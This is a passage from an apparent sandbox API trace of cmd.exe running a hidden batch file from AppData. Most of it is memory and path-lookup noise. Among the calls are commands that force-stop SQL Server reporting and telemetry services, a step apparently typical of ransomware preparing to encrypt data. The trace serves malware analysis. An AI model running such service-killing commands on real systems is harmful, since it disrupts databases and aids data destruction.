_String2="CALL") returned 11 [0202.380] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.380] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.380] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.380] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.380] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.380] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.380] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.380] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.380] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.380] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.380] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.380] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.380] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.380] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.380] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.380] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.380] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.380] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.381] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.381] SetErrorMode (uMode=0x0) returned 0x1 [0202.381] GetProcessHeap () returned 0x3e0000 [0202.381] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.381] GetProcessHeap () returned 0x3e0000 [0202.381] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.381] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.381] GetProcessHeap () returned 0x3e0000 [0202.381] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.381] GetProcessHeap () returned 0x3e0000 [0202.381] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.382] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.382] GetLastError () returned 0x2 [0202.383] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.383] GetLastError () returned 0x2 [0202.383] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.383] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.384] GetLastError () returned 0x2 [0202.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.384] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.385] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.385] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.385] SetErrorMode (uMode=0x0) returned 0x1 [0202.385] GetProcessHeap () returned 0x3e0000 [0202.385] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.385] GetProcessHeap () returned 0x3e0000 [0202.385] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.386] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.386] GetProcessHeap () returned 0x3e0000 [0202.386] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.386] GetProcessHeap () returned 0x3e0000 [0202.386] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.386] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.387] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.387] GetLastError () returned 0x2 [0202.387] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.387] GetLastError () returned 0x2 [0202.388] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.388] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.388] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.388] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.389] GetLastError () returned 0x2 [0202.389] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.389] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.389] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.390] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.390] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.390] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.390] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.390] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ReportServer /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ReportServer /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ReportServer /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xba4, dwThreadId=0x438)) returned 1 [0202.394] CloseHandle (hObject=0x74) returned 1 [0202.394] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.394] GetProcessHeap () returned 0x3e0000 [0202.394] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.394] GetEnvironmentStringsW () returned 0x3f8408* [0202.394] GetProcessHeap () returned 0x3e0000 [0202.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.394] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.394] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0202.518] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.518] CloseHandle (hObject=0x78) returned 1 [0202.518] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.518] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.518] GetProcessHeap () returned 0x3e0000 [0202.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.518] GetEnvironmentStringsW () returned 0x3f8408* [0202.518] GetProcessHeap () returned 0x3e0000 [0202.518] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.518] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.518] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.518] GetProcessHeap () returned 0x3e0000 [0202.518] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.518] GetEnvironmentStringsW () returned 0x3f8408* [0202.518] GetProcessHeap () returned 0x3e0000 [0202.518] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.519] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.519] GetProcessHeap () returned 0x3e0000 [0202.519] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.519] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.519] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.519] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.519] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.519] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.519] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.519] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.519] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.519] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.520] SetConsoleInputExeNameW () returned 0x1 [0202.520] GetConsoleOutputCP () returned 0x1b5 [0202.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.520] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0202.520] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0202.520] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.520] SetFilePointer (in: hFile=0x78, lDistanceToMove=3445, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd75 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.520] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.520] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.521] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.521] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.521] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.521] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.521] GetProcessHeap () returned 0x3e0000 [0202.521] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.521] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.521] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd75 [0202.521] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb4c, lpOverlapped=0x0) returned 1 [0202.521] SetFilePointer (in: hFile=0x78, lDistanceToMove=3478, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd96 [0202.521] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLTELEMETRY$ECWDB2 /y\r\nmework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 33 [0202.521] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.521] GetFileType (hFile=0x78) returned 0x1 [0202.522] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.522] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd96 [0202.522] GetProcessHeap () returned 0x3e0000 [0202.522] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.522] GetProcessHeap () returned 0x3e0000 [0202.522] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.525] _tell (_FileHandle=3) returned 3478 [0202.525] _close (_FileHandle=3) returned 0 [0202.525] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.525] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.525] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.525] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.525] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.525] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.525] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.525] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.525] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.525] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.525] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.525] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.525] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.525] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.525] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.525] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.525] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.525] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.525] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.525] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.525] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.525] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.525] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.526] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.526] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.526] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.526] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.526] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.526] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.526] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.526] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.526] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.526] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.526] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.526] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.526] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.526] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.526] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.526] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.526] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.526] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.526] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.526] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.526] SetErrorMode (uMode=0x0) returned 0x1 [0202.526] GetProcessHeap () returned 0x3e0000 [0202.526] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.527] GetProcessHeap () returned 0x3e0000 [0202.527] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.527] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.527] GetProcessHeap () returned 0x3e0000 [0202.527] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.527] GetProcessHeap () returned 0x3e0000 [0202.527] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.527] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.528] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.528] GetLastError () returned 0x2 [0202.528] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.528] GetLastError () returned 0x2 [0202.529] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.529] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.529] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.530] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.530] GetLastError () returned 0x2 [0202.530] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.530] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.531] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.533] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.533] SetErrorMode (uMode=0x0) returned 0x1 [0202.533] GetProcessHeap () returned 0x3e0000 [0202.533] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.533] GetProcessHeap () returned 0x3e0000 [0202.533] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.533] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.533] GetProcessHeap () returned 0x3e0000 [0202.533] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.533] GetProcessHeap () returned 0x3e0000 [0202.533] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.534] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.534] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.534] GetLastError () returned 0x2 [0202.534] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.535] GetLastError () returned 0x2 [0202.535] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.535] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.535] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.536] GetLastError () returned 0x2 [0202.536] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.536] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.537] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.537] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.537] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.537] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.538] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.538] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLTELEMETRY$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLTELEMETRY$ECWDB2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLTELEMETRY$ECWDB2 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x310, dwThreadId=0x64)) returned 1 [0202.542] CloseHandle (hObject=0x78) returned 1 [0202.542] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.542] GetProcessHeap () returned 